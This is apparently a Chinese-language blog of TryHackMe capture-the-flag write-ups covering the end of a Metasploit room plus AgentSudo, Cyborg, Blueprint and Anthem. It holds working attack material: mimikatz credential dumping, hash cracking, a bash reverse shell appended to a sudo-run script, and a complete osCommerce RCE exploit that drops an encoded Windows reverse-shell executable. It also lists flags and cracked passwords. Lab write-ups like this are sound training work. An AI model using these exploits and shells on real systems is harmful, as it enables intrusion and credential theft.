set LHOSTS 10.13.21.55輸入 run 開始執行- We can now verify that we have expanded permissions using the command getprivs. What permission listed allows us to take ownership of files?- 輸入 getprivs 可以看到我們的權限
他說要可以 take ownership of files
所以是 SeTakeOwnershipPrivilege

Looting

Mentioned within this question is the term ’living in’ a process. Often when we take over a running program we ultimately load another shared library into the program (a dll) which includes our malicious code. From this, we can spawn a new thread that hosts our shell.他說要找印表機相關的程式
先下 ps 觀察 processes透過 Google 可以發現是 spoolsv.exe- 他的 pid 是 1300輸入 getuid 觀察目前我們是什麼使用者- 輸入 migrate 1300- 把自己的 process 搬移到 pid 1300 上面
Let’s check what user we are now with the command getuid. What user is listed?- 再輸入一次 getuid
會發現我們變成 NT AUTHORITY\SYSTEM 權限!輸入 load kiwi 載入 mimikatz- 輸入 help 觀察 mimikatz 使用方法- Which command allows up to retrieve all credentials?- creds_all
Run this command now. What is Dark’s password? Mimikatz allows us to steal this password out of memory even without the user ‘Dark’ logged in as there is a scheduled task that runs the Icecast as the user ‘Dark’. It also helps that Windows Defender isn’t running on the box ;) (Take a look again at the ps list, this box isn’t in the best shape with both the firewall and defender disabled)- 上面就有寫到 Dark 的密碼為 Password01!

Post-Exploitation

What command allows us to dump all of the password hashes stored on the system? We won’t crack the Administrative password in this case as it’s pretty strong (this is intentional to avoid password spraying attempts)輸入 hashdump 可以 dump 出所有的密碼 hash
其實我們在這邊也可以複製 Dark 的 hash 然後用 John 爆爆看john hash.txt --wordlist=/opt/rockyou.txt --format=NT
可以發現也是可以快速爆出密碼While more useful when interacting with a machine being used, what command allows us to watch the remote user’s desktop in real time?- 這題剛開始我以為是說螢幕截圖 screenshot
輸入完之後會自動的存一張即時的圖檔
不過後來發現他要是 real time，所以答案是 screenshare-
他會開一個 html 然後自動刷新、可以即時監看
How about if we wanted to record from a microphone attached to the system?- 監聽麥克風可以使用 record_micTo complicate forensics efforts we can modify timestamps of files on the system. What command allows us to do this? Don’t ever do this on a pentest unless you’re explicitly allowed to do so! This is not beneficial to the defending team as they try to breakdown the events of the pentest after the fact.- 竄改 timestamp 可以用 timestompMimikatz allows us to create what’s called a golden ticket, allowing us to authenticate anywhere with ease. What command allows us to do this?- golden_ticket_create可以透過 run post/windows/manage/enable_rdp 開啟RDP

AgentSudo (Try Hack Me Writeup)

Sat, 31 Jul 2021 23:44:00 +0800

URL: https://tryhackme.com/room/agentsudoctf

IP : 10.10.119.64

Recon

老梗 nmap -A 10.10.119.64
發現有開FTP
SSH
HTTP嘗試進入 HTTP-
看到他說需要在 useragent 放 Codename (機密代號)
又說 Dear agent, 下面有說 Agent R
所以基本上可以先猜測 Agent A 到 Z

爆猜機密代號

瀏覽器沒有太方便，所以我們先把瀏覽器 request 轉 curl
對著 F12 的 Reuest 右鍵，Copy as cURL
curl 'http://10.10.119.64/' -H 'User-Agent: meow' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Connection: keep-alive' -H 'Upgrade-Insecure-Requests: 1' -H 'Cache-Control: max-age=0, no-cache' -H 'Pragma: no-cache'curl 轉 Python request- 我使用這個網站 https://curl.trillworks.com/把 curl 貼上就可以自動轉 python 的 request 了接下來寫一段扣爆破因為如果猜錯他會回傳的字都是一樣的，那就猜測輸入正確時，他回傳的東西會不一樣，所以最簡單的方法可以用字串長度來比對，輸入錯誤時長度是 218 運氣很好，C 就猜到ㄌ

import requests

for i in "ABCDEFGHIJKLMNOPQRSTUVWXYZ":
 headers = {
 'User-Agent': i ,
 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
 'Accept-Language': 'en-US,en;q=0.5',
 'Connection': 'keep-alive',
 'Upgrade-Insecure-Requests': '1',
 'Cache-Control': 'max-age=0, no-cache',
 'Pragma': 'no-cache',
 }

 response = requests.get('http://10.10.119.64/', headers=headers).text
 print(i,len(response))

用 User-Agent:C 發 request在 Firefox 上使用右鍵， Edit and Resend- 修改 User-Agent 為 C 並送出可以發現他自動跳轉到這個網頁- http://10.10.119.64/agent_C_attention.php
內文中發現了 Agent C 叫做 chris
而且他的主管在嘴他說使用弱密碼

FTP

嘗試爆破 FTP因為 nmap 有掃到 ssh 跟 ftp，隨便取 ftp
透過 Hydra + Rockyou 字典來爆hydra -l chris -P /opt/rockyou.txt ftp://10.10.119.64可以了解到帳號為 chris密碼為 crystal嘗試登入 FTP- ftp 10.10.119.64
輸入 ls 觀察 ftp 裡面的檔案輸入 get 檔名 把檔案依序載下來觀察 txt 檔案- cat To_agentJ.txt
他說兩張照片都是假ㄉ，裡面有藏東東

Stego

起手式 stringsstrings cutie.png
可以發現裡面藏了一點點的字，但是用奇怪的編碼或加密QQ透過 binwalk 觀察是否裡面有藏檔案-
發現 png 後面塞了一個 zip透過 foremost 解出裡面的檔案- foremost cutie.png
會發現資料夾裡面有一包 zip
解壓縮 zip- 用最直覺的 unzip
會發現噴錯
跟據這篇的講法，可以用 7z 來解7z x 00000067.zip-
用 7z 解，會發現 zip 需要密碼爆破 zip 密碼- 先把 zip 轉成約翰格式
zip2john 00000067.zip > j.txt
john j.txt --wordlist=/opt/rockyou.txt
就可以取得密碼為 alien
解壓縮 zip- 7z x 00000067.zip
並使用密碼 alien 即可解壓完畢
解壓內容可以看到一組奇怪的密碼 QXJlYTUx
透過 base64 解碼base64 -d 即可獲得 Area51接下來看到另外一個檔案- cute-alien.jpg`
這邊使用 steghide 進行解密
steghide extract -sf cute-alien.jpg並搭配 Area51- 發現成功的解出了 message.txt
我們可以發現文章內- 使用者 : james
密碼 : hackerrules!

SSH

透過 SSH 進行登入ssh james@10.10.119.64
尋找到 user_flag.txt-
b03d975e8c92a7c04146cfa7a5a313c7

提權

輸入 sudo -l
所以我們不能以 root 身分執行/bin/bashWhat is the incident of the photo called?- 裡面還找到了一張照片
透過 Google 以圖搜圖可以找到這篇新聞
Roswell alien autopsy繼續提權- 透過 scp 上傳 Linpeas本機scp linpeas.sh james@10.10.119.64:/tmp
遠端- bash linpeas.sh | tee meow.txt可以觀察到 Linpeas 把 sudo 版本變紅色-
透過Google Sudo 1.8.21p2可以找到 CVE-2019-14287
https://www.exploit-db.com/exploits/47502遠端機器剛好有 python 跟 vim- 那就直接開 vim 把 exploit 給貼上
把 python exploit code 給 run 起來- 詢問使用者名稱，就輸入 james
成功提權!取得 root flag-
b53a02f55b57d4439e3341834d70c062(Bonus) Who is Agent R?- 信最後有寫 DesKel aka Agent R
阿不是阿，你名字裡哪裡有 R ㄌ ?__?

Cyborg (Try Hack Me Writeup)

Thu, 29 Jul 2021 23:58:00 +0800

URL : https://tryhackme.com/room/cyborgt8
IP : 10.10.210.57

Recon

老梗 nmap -A 10.10.210.5Scan the machine, how many ports are open?- 2What service is running on port 22?- SSHWhat service is running on port 80?- HTTP``python3 dirsearch.py -u http://10.10.210.57/ -e all- /admin/
/etc/

解密

先從 /etc/ 路徑開始看裡面有啥http://10.10.210.57/etc
找到路徑底下有一個 passwd- http://10.10.210.57/etc/squid/passwdmusic_archive:$apr1$BpZ.Q.1m$F0qqPwHSOG50URuOVQTTn.
看起來是 hash 格式，直接複製出來給約翰
john a.txt --wordlist=/opt/rockyou
帳號 : music_archive
密碼 : squidward

尋寶

去逛 /admin/發現有 Archive 可以下載
解開之後發現是一種奇怪格式-
檔案都是 binary 無法 print
Readme 提醒我們可以去看 https://borgbackup.readthedocs.io/
borg 是一種備份程式嘗試簡單的看完說明後- borg list .輸入密碼，剛剛約翰破出來的 squidward
可以看到一些資訊borg mount . ../a- 把檔案掛載起來
發現掛載的檔案裡面有 note-
alex:S3cretP@s3
看起來就很像帳密

進入系統

用 ssh 搭配帳密登入
取得 user flag
flag{1_hop3_y0u_ke3p_th3_arch1v3s_saf3}嘗試提權- 先用 sudo -l 看我們有什麼權限
發現我們可以用 sudo 執行 /etc/mp3backups/backup.sh觀察權限-
發現我們是這個檔案的擁有者，但我們不能修改他
不過可以透過 chmod +w 新增 Write 權限插入 shell- echo "bash -c 'bash -i >& /dev/tcp/10.13.21.55/7877 0>&1'" >> /etc/mp3backups/backup.sh
直接用 reverse shell 插入檔案最下方執行 shell- 攻擊機開啟監聽nc -vlk 7877被駭機用 sudo 執行該檔案- sudo /etc/mp3backups/backup.sh拿到 root shell!- 貓根旗幟-
flag{Than5s_f0r_play1ng_H0p£_y0u_enJ053d}

Blueprint (Try Hack Me Writeup)

Thu, 29 Jul 2021 23:55:00 +0800

URL : https://tryhackme.com/room/blueprint
IP : 10.10.66.7

Scan

一樣老梗 nmap -A 10.10.66.7 發現開了很多 port
80 port 進去是 404先放一邊

└─$ nmap -A 10.10.66.7
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-29 03:57 EDT
Nmap scan report for 10.10.66.7
Host is up (0.32s latency).
Not shown: 984 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: 404 - File or directory not found.
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
443/tcp open ssl/http Apache httpd 2.4.23 (OpenSSL/1.0.2h PHP/5.6.28)
|_http-server-header: Apache/2.4.23 (Win32) OpenSSL/1.0.2h PHP/5.6.28
|_http-title: Bad request!
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after: 2019-11-08T23:48:47
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
445/tcp open microsoft-ds Windows 7 Home Basic 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
1165/tcp filtered qsm-gui
1971/tcp filtered netop-school
3306/tcp open mysql MariaDB (unauthorized)
5190/tcp filtered aol
8080/tcp open http Apache httpd 2.4.23 (OpenSSL/1.0.2h PHP/5.6.28)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.23 (Win32) OpenSSL/1.0.2h PHP/5.6.28
|_http-title: Index of /
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49158/tcp open msrpc Microsoft Windows RPC
49159/tcp open msrpc Microsoft Windows RPC
49160/tcp open msrpc Microsoft Windows RPC
Service Info: Hosts: www.example.com, BLUEPRINT, localhost; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -20m00s, deviation: 34m36s, median: -1s
|_nbstat: NetBIOS name: BLUEPRINT, NetBIOS user: , NetBIOS MAC: 02:24:bb:82:08:6f (unknown)
| smb-os-discovery:
| OS: Windows 7 Home Basic 7601 Service Pack 1 (Windows 7 Home Basic 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1
| Computer name: BLUEPRINT
| NetBIOS computer name: BLUEPRINT\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2021-07-29T08:58:58+01:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-07-29T07:58:57
|_ start_date: 2021-07-29T07:49:40

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 131.87 seconds

測試老洞445 port SMB 有開，又是 Windows 系統很直覺的掃一下老洞 MS17-010
https://github.com/3ndG4me/AutoBlue-MS17-010
發現打不進去 QQ觀察 web- 發現 8080 port 跟 443 port 的 web server 都指向同一個 web server
裡面有一個 oscommerce-2.3.4 路徑

Exploit

尋找 exploitGoogle oscommerce-2.3.4 Exploit
https://www.exploit-db.com/exploits/44374部屬 exploit- wget https://www.exploit-db.com/download/44374 -O 44374.py
修改路徑

# enter the the target url here, as well as the url to the install.php (Do NOT remove the ?step=4)
 base_url = "http://10.10.66.7:8080/oscommerce-2.3.4/catalog/"
 target_url = "http://10.10.66.7:8080/oscommerce-2.3.4/catalog/install/install.php?step=4"

修改指令payload += 'system("whoami");'
接著執行 44374.py
發現禁止 system嘗試 phpinfo()- 發現 disable_functions 只有禁止 system
這邊有非常多種繞過方法，例如passthru
shell_exec
exec在此取用 passthru再次嘗試 payload- payload += 'passthru("whoami");'
發現他直接吐了一個 system 給我!!準備戳 reverse shell- 找到一個 php windows reverse shellhttps://github.com/Dhayalanb/windows-php-reverse-shell/blob/master/Reverse%20Shell.php
基本上他的原理是寫檔，把base64轉成一隻exe跑起reverse shell拿來微調一下修改 ip、port、然後把 system 改 passthru放進 44374.py完整 exploit code

# Exploit Title: osCommerce 2.3.4.1 Remote Code Execution
# Date: 29.0.3.2018
# Exploit Author: Simon Scannell - https://scannell-infosec.net 
# Version: 2.3.4.1, 2.3.4 - Other versions have not been tested but are likely to be vulnerable
# Tested on: Linux, Windows

# If an Admin has not removed the /install/ directory as advised from an osCommerce installation, it is possible
# for an unauthenticated attacker to reinstall the page. The installation of osCommerce does not check if the page
# is already installed and does not attempt to do any authentication. It is possible for an attacker to directly
# execute the "install_4.php" script, which will create the config file for the installation. It is possible to inject
# PHP code into the config file and then simply executing the code by opening it.

import requests

# enter the the target url here, as well as the url to the install.php (Do NOT remove the ?step=4)
base_url = "http://10.10.66.7:8080/oscommerce-2.3.4/catalog/"
target_url = "http://10.10.66.7:8080/oscommerce-2.3.4/catalog/install/install.php?step=4"

data = {
 'DIR_FS_DOCUMENT_ROOT': './'
}

# the payload will be injected into the configuration file via this code
# ' define(\'DB_DATABASE\', \'' . trim($HTTP_POST_VARS['DB_DATABASE']) . '\');' . "\n" .
# so the format for the exploit will be: '); PAYLOAD; /*
# fsockopen("110.14.7.198",7877);popen("/bin/sh -i &3 2>&3", "r");
payload = '\'); \n'
# payload += 'echo passthru("type configure.php");'
payload += """
header('Content-type: text/plain');
$ip = "10.14.7.198"; //change this
$port = "7877"; //change this
$payload = "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";
$evalCode = gzinflate(base64_decode($payload));
$evalArguments = " ".$port." ".$ip;
$tmpdir ="C:\\windows\\temp";
chdir($tmpdir);
$res .= "Using dir : ".$tmpdir;
$filename = "D3fa1t_shell.exe";
$file = fopen($filename, 'wb');
fwrite($file, $evalCode);
fclose($file);
$path = $filename;
$cmd = $path.$evalArguments;
$res .= "\n\nExecuting : ".$cmd."\n";
echo $res;
$output = passthru($cmd);
"""

payload += '\n\n/*'

data['DB_DATABASE'] = payload

# exploit it
r = requests.post(url=target_url, data=data)

if r.status_code == 200:
 print("[+] Successfully launched the exploit. Open the following URL to execute your code\n\n" + base_url + "install/includes/configure.php")
else:
 print("[-] Exploit did not execute as planned")

本機端開 nc -vlk 7877 進行監聽php 端執行下去，就拿到 shell 了!!
由於我們是 system 權限- 所以可以直接拿 admin 的 Root flag
在 C:\Users\Administrator\Desktop\root.txt.txt我猜應該是出題者手殘之類的，不小心打了兩次 .txt 吧THM{aea1e3ce6fe7f89e10cea833ae009bee}

破密

題目說需要破 "Lab" user NTML hash decrypted我覺得題目打錯字，應該是說 NTLM 的 hash XD由於我們是 system 權限，很大，所以可以用指令直接匯出兩個 NTLM 相關檔案、SAM 與 SYSTEM- reg save HKLM\SAM C:\sam
reg save HKLM\SYSTEM C:\system接下來把兩個檔案傳回本機- 這邊我用的方法是，直接把這兩個檔案放到 web 路徑中，用wget來載
reverse shellcopy sam C:\xampp\htdocs\oscommerce-2.3.4\catalog\install\include攻擊機- wget http://10.10.66.7:8080/oscommerce-2.3.4/catalog/install/includes/sam
wget http://10.10.66.7:8080/oscommerce-2.3.4/catalog/install/includes/user將 sam、system 轉為 john 格式- samdump2 system sam > j.txt
題目問 LAB 使用者，所以我們只需要保留這一行
Lab:1000:aad3b435b51404eeaad3b435b51404ee:30e87bf999828446a1c1209ddde4c450:::而我們要破的真正 hash 是這個
30e87bf999828446a1c1209ddde4c450暴力破解- 其實暴力破解通常是下下策，往往會先試著Google之類尋找網路資源
不過我 Google 這段 hash 值卻出現了一堆爆雷的內容，只好自己破解QQ
通常我愛用 rockyou.txt 但在這邊破不出來
後來我採用了這一包https://github.com/danielmiessler/SecLists/blob/master/Passwords/xato-net-10-million-passwords-dup.txt
不要問我為什麼……隨便找ㄉjohn j.txt --wordlist=/opt/xato-net-10-million-passwords-dup.txt --format=NT爆出密碼 googleplus另外一種網路解法- https://crackstation.net/
輸入 30e87bf999828446a1c1209ddde4c450
回傳密碼為 googleplus

Anthem (Try Hack Me Writeup)

Thu, 29 Jul 2021 23:47:00 +0800

URL : https://tryhackme.com/room/anthem

IP : 10.10.18.8

這題感覺有點廢，但還是寫一下WP好ㄌ
機器開機要等將近5分鐘為什麼?
不知道，反正我等了5分鐘才有畫面
估計是因為 Windows 有點肥ㄅ

Recon

老梗 nmap -A 有開 80、3389
有抓到 robots.txt

Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-28 21:42 EDT
Nmap scan report for 10.10.18.8
Host is up (0.28s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-robots.txt: 4 disallowed entries
|_/bin/ /config/ /umbraco/ /umbraco_client/
|_http-title: Anthem.com - Welcome to our blog
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: WIN-LU09299160F
| NetBIOS_Domain_Name: WIN-LU09299160F
| NetBIOS_Computer_Name: WIN-LU09299160F
| DNS_Domain_Name: WIN-LU09299160F
| DNS_Computer_Name: WIN-LU09299160F
| Product_Version: 10.0.17763
|_ System_Time: 2021-07-29T01:42:55+00:00
| ssl-cert: Subject: commonName=WIN-LU09299160F
| Not valid before: 2021-07-28T01:38:13
|_Not valid after: 2022-01-27T01:38:13
|_ssl-date: 2021-07-29T01:43:01+00:00; +1s from scanner time.

robots.txt還有叫做 umbraco 的東西Google 後發現他是一種 CMS
看到一組奇怪密碼 UmbracoIsTheBest!

UmbracoIsTheBest!

 # Use for all search robots
 User-agent: *

 # Define the directories not to crawl
 Disallow: /bin/
 Disallow: /config/
 Disallow: /umbraco/
 Disallow: /umbraco_client/

回答問題

普通問題

What port is for the web server?80What port is for remote desktop service?- 3389What is a possible password in one of the pages web crawlers check for?- 他都說 crawlers 了，所以應該就是 robots.txt 的密碼
UmbracoIsTheBest!What CMS is the website using?- umbraco
robots.txt 上有寫What is the domain of the website?- anthem.com
首頁上就有

通靈問題

What’s the name of the AdministratorCMS 中有一篇文章這樣寫
